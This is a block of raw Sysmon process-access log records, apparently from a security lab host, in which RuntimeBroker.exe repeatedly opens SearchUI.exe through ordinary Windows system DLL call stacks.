13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
